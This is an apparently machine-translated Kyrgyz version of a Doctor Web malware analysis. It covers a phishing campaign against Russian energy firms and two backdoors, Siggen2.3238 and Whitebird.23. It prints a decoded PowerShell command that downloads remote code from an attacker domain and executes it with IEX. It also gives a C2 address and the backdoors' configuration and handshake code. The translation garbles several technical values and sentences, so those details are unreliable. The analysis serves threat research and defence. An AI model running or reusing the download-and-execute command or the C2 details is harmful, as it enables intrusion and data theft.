Компьютердик коопсуздук инциденттерин иликтөө боюнча биздин тажрыйбабыз көрсөткөндөй, электрондук почта дагы эле чабуулчулар тарабынан чабуулга кабылган тармак инфраструктураларына кирүү үчүн колдонулган эң кеңири таралган каналдардын бири болуп саналат. Шектүү (же анчалык деле шектүү эмес) кат менен жасалган бир этиятсыздык андан аркы инфекциянын кириш чекити болуп калат, ошондуктан киберкылмышкерлер ар кандай деңгээлде ийгиликке жетсе да, социалдык инженерия ыкмаларын активдүү колдонуп жатышат.
Бул постто биз Россиянын отун-энергетикалык комплексиндеги бир катар ишканаларга багытталган спам кампаниясы боюнча жакында жүргүзүлгөн иликтөөбүз тууралуу айткыбыз келет. Бардык кол салуулар жасалма электрондук почта аркылуу бир эле сценарий боюнча жүрдү жана эч ким бул каттардын тексттик мазмунуна көп күч жумшаган жок.
Чалгындоо кызматы
Мунун баары 2020-жылдын апрель айынын аягында, Doctor Web вирус аналитиктери хакерлер Орусиянын отун-энергетикалык комплексиндеги бир катар ишканалардын кызматкерлерине жаңыланган телефон маалыматын жөнөткөн спам кампаниясын аныктагандан кийин башталды. Албетте, бул жөнөкөй эле тынчсыздануу көрсөтүүсү болгон жок, анткени каталог реалдуу эмес жана .docx документтери алыскы ресурстардан эки сүрөттү жүктөп алган.
Алардын бири news[.]zannews[.]com серверинен колдонуучунун компьютерине жүктөлгөн. Белгилей кетсек, домендик аталыш Казакстандын антикоррупциялык медиа борборунун доменине окшош - zannews[.]kz. Башка жагынан алганда, колдонулган домен дароо эле TOPNEWS деп аталган дагы бир 2015 кампаниясын эске салды, ал ICEFOG бэкдорун колдонгон жана аттарында "жаңылыктар" субсаптары менен трояндык башкаруу домендери болгон. Дагы бир кызыктуу өзгөчөлүк, ар кандай алуучуларга электрондук каттарды жөнөтүүдө, сүрөттү жүктөп алуу үчүн суроо-талаптарда ар кандай суроо-талап параметрлери же уникалдуу сүрөт аттары колдонулган.
Бул “ишенимдүү” адресатты аныктоо үчүн маалымат чогултуу максатында жасалган деп эсептейбиз, ал катты керектүү учурда ачууга кепилдик берилет. SMB протоколу экинчи серверден сүрөттү жүктөп алуу үчүн колдонулган, бул алынган документти ачкан кызматкерлердин компьютерлеринен NetNTLM хэштерин чогултуу үчүн жасалышы мүмкүн.
Жана бул жерде жалган каталог менен каттын өзү:
Ушул жылдын июнь айында хакерлер сүрөттөрдү жүктөө үчүн sports[.]manhajnews[.]com деген жаңы домендик аталышты колдоно башташкан. Талдоо көрсөткөндөй, manhajnews[.]com субдомендери кеминде 2019-жылдын сентябрынан бери спам жөнөтүүдө колдонулуп келе жатат. Бул кампаниянын максаттарынын бири Орусиянын чоң университети болгон.
Ошондой эле июнь айына карата чабуулдун уюштуруучулары өздөрүнүн каттары үчүн жаңы текстти ойлоп табышты: бул жолу документте өнөр жайды өнүктүрүү тууралуу маалымат камтылган. Каттын текстинде анын автору же орус тилинде сүйлөгөн адам эмес экени, же өзү жөнүндө атайылап ушундай пикир жаратып жатканы ачык көрүнүп турган. Тилекке каршы, өнөр жайды өнүктүрүү идеялары, адаттагыдай эле, жөн гана мукаба болуп чыкты – документ кайрадан эки сүрөттү жүктөп алды, ал эми сервер жүктөө[.]inklingpaper[.]com болуп өзгөртүлдү.
Кийинки жаңычылдык июль айында ишке ашты. Антивирус программалары тарабынан зыяндуу документтерди аныктоону кыйгап өтүү аракетинде чабуулчулар сырсөз менен шифрленген Microsoft Word документтерин колдоно башташты. Ошол эле учурда чабуулчулар классикалык социалдык инженерия ыкмасын - сыйлык билдирүүсүн колдонууну чечишкен.
Кайрылуунун тексти кайра эле ошол стилде жазылып, дарек ээсинде кошумча шектенүүлөрдү пайда кылды. Сүрөттү жүктөө сервери да өзгөргөн жок.
Баардык учурларда каттарды жөнөтүү үчүн mail[.]ru жана yandex[.]ru домендеринде катталган электрондук почта ящиктери колдонулганын эске алыңыз.
кол салуу
2020-жылдын сентябрынын башында иш-аракет кылууга убакыт келди. Биздин вирустук аналитиктер чабуулдардын жаңы толкунун катташты, анда чабуулчулар телефон каталогун жаңыртуу шылтоосу менен кайрадан кат жөнөтүштү. Бирок, бул жолу тиркемеде зыяндуу макро камтылган.
Тиркелген документти ачканда, макрос эки файлды түздү:
- VBS скрипти %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs, ал пакеттик файлды ишке киргизүү үчүн арналган;
- Пакет файлынын өзү %APPDATA%configstest.bat, ал бүдөмүк болгон.
Анын ишинин маңызы белгилүү бир параметрлер менен Powershell кабыгын ишке киргизүүгө байланыштуу. Кабкага берилген параметрлер буйруктарга декоддолот:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;Берилген буйруктардан көрүнүп тургандай, пайдалуу жүк жүктөлгөн домен кайрадан жаңылыктар сайты катары жашырылган. Жөнөкөй , анын жалгыз милдети командалык жана башкаруу серверинен shellcode алуу жана аны аткаруу. Биз жабырлануучунун компьютерине орнотула турган эки типтеги арткы эшиктерди аныктай алдык.
BackDoor.Siggen2.3238
Биринчиси BackDoor.Siggen2.3238 — биздин адистер буга чейин жолуккан эмес жана башка антивирус сатуучулар да бул программа тууралуу эч кандай сөз болгон эмес.
Бул программа C++ тилинде жазылган жана 32-бит Windows операциялык системаларында иштеген бэкдор.
BackDoor.Siggen2.3238 эки протоколду колдонуу менен башкаруу сервери менен байланыша алат: HTTP жана HTTPS. Сыналган үлгү HTTPS протоколун колдонот. Төмөнкү User-Agent серверге суроо-талаптарда колдонулат:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
Бул учурда, бардык суроо-талаптар төмөнкү параметрлердин топтому менен камсыз кылынат:
%s;type=%s;length=%s;realdata=%send
мында ар бир сап %s тиешелүү түрдө төмөнкүгө алмаштырылат:
- жуккан компьютердин идентификатору,
- жөнөтүлгөн суроо-талаптын түрү,
- реалдуу маалыматтар талаасындагы маалыматтардын узундугу,
- маалыматтар.
Инфекцияланган система жөнүндө маалыматты чогултуу стадиясында, бэкдор төмөнкүдөй сызыкты жаратат:
lan=%s;cmpname=%s;username=%s;version=%s;
мында lan – вирус жуккан компьютердин IP дареги, cmpname – компьютердин аты, колдонуучу аты – колдонуучунун аты, версия – 0.0.4.03 сап.
Бул маалымат sysinfo идентификатору менен POST сурамы аркылуу https[:]//31.214[.]157.14/log.txt дарегинде жайгашкан башкаруу серверине жөнөтүлөт. Жооп болсо BackDoor.Siggen2.3238 ЖҮРӨК сигналын кабыл алат, байланыш ийгиликтүү деп эсептелет, ал эми бэкдор сервер менен байланыштын негизги циклин баштайт.
Иштөө принциптеринин толук сүрөттөлүшү BackDoor.Siggen2.3238 бизде бар .
BackDoor.Whitebird.23
Экинчи программа - бул бизге Казакстандагы мамлекеттик мекеме менен болгон окуядан белгилүү болгон BackDoor.Whitebird бэкдорунун модификациясы. Бул версия C++ тилинде жазылган жана 32 биттик жана 64 биттик Windows операциялык системаларында иштөө үчүн иштелип чыккан.
Бул түрдөгү көпчүлүк программалар сыяктуу эле, BackDoor.Whitebird.23 башкаруу сервери менен шифрленген байланышты жана вирус жуккан компьютерди уруксатсыз башкаруу үчүн иштелип чыккан. Бир тамчы колдонуу менен бузулган системага орнотулган .
Биз изилдеген үлгү эки экспорту бар зыяндуу китепкана болду:
- Google Play
- Test.
Ишинин башталышында ал 0x99 байт менен XOR операциясынын негизинде алгоритмди колдонуп, бэкдордун корпусуна орнотулган конфигурацияны чечмелейт. Конфигурация төмөнкүдөй көрүнөт:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
Анын үзгүлтүксүз иштешин камсыз кылуу үчүн, бэкдор талаада көрсөтүлгөн маанини өзгөртөт жумушчу_саат конфигурациялар. Талаа 1440 же 0 маанилерин алган жана суткадагы ар бир сааттын ар бир мүнөтүн чагылдырган 1 байтты камтыйт. Ар бир тармак интерфейси үчүн өзүнчө жип түзөт, ал интерфейсти угат жана вирус жуккан компьютерден прокси серверден авторизация пакеттерин издейт. Мындай пакет табылганда, бэкдор прокси сервер тууралуу маалыматты өзүнүн тизмесине кошот. Мындан тышкары, WinAPI аркылуу прокси бар экендигин текшерет InternetQueryOptionW.
Программа учурдагы мүнөт менен саатты текшерет жана аны талаадагы маалыматтар менен салыштырат жумушчу_саат конфигурациялар. Эгерде күндүн тиешелүү мүнөтүнүн мааниси нөлгө барабар эмес болсо, анда башкаруу сервери менен байланыш түзүлөт.
Серверге туташууну орнотуу кардар менен сервердин ортосундагы TLS версия 1.0 протоколун колдонуу менен байланыш түзүүнү симуляциялайт. Арткы эшиктин корпусунда эки буфер бар.
Биринчи буферде TLS 1.0 Client Hello пакети камтылган.
Экинчи буферде ачкыч узундугу 1.0x0 байт болгон TLS 100 Client Key Exchange пакеттери, Change Cipher Spec, Шифрленген кол алышуу билдирүүсү бар.
Client Hello пакетин жөнөтүүдө бэкдор учурдагы убакыттын 4 байтын жана Client Random талаасына 28 байт псевдококус маалыматты жазат, төмөнкүдөй эсептелинет:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
Кабыл алынган пакет башкаруу серверине жөнөтүлөт. Жооп (Server Hello пакети) текшерет:
- TLS протоколунун 1.0 версиясына ылайык келүү;
- сервер белгилеген убакыт белгисине кардар тарабынан көрсөтүлгөн убакыт белгисинин (Кокус маалыматтар пакетинин талаасынын биринчи 4 байты) дал келүүсү;
- кардардын жана сервердин кокус маалымат талаасындагы убакыт белгисинен кийинки алгачкы 4 байттын дал келүүсү.
Көрсөтүлгөн дал келген учурда, бэкдор Клиент ачкыч алмашуу пакетин даярдайт. Бул үчүн, ал Client Key Exchange пакетиндеги Коомдук ачкычты, ошондой эле Шифрленген кол алышуу билдирүү пакетиндеги Шифрлөө IV жана Шифрлөө маалыматтарын өзгөртөт.
Андан кийин бэкдор пакетти буйрук жана башкаруу серверинен алат, TLS протоколунун версиясы 1.0 экендигин текшерет, андан кийин дагы 54 байт (пакеттин корпусу) кабыл алат. Бул туташууну орнотууну аяктайт.
Иштөө принциптеринин толук сүрөттөлүшү BackDoor.Whitebird.23 бизде бар .
Корутунду жана корутундулар
Документтерди, зыяндуу программаларды жана колдонулган инфраструктураны талдоо чабуулду кытайлык APT топторунун бири даярдаган деп ишенимдүү айтууга мүмкүндүк берет. Ийгиликтүү чабуул болгон учурда жабырлануучулардын компьютерлерине орнотулган бэкдорлордун функционалдуулугун эске алганда, инфекция, жок эле дегенде, чабуулга кабылган уюмдардын компьютерлеринен жашыруун маалыматтын уурдалышына алып келет.
Мындан тышкары, өзгөчө функциялуу жергиликтүү серверлерге адистештирилген трояндарды орнотуу өтө ыктымалдуу сценарий болуп саналат. Булар домен контроллерлору, почта серверлери, Интернет шлюздары ж.б. болушу мүмкүн. Биз мисалда көрүп тургандай , мындай серверлер ар кандай себептерден улам чабуулчуларды өзгөчө кызыктырат.
Source: www.habr.com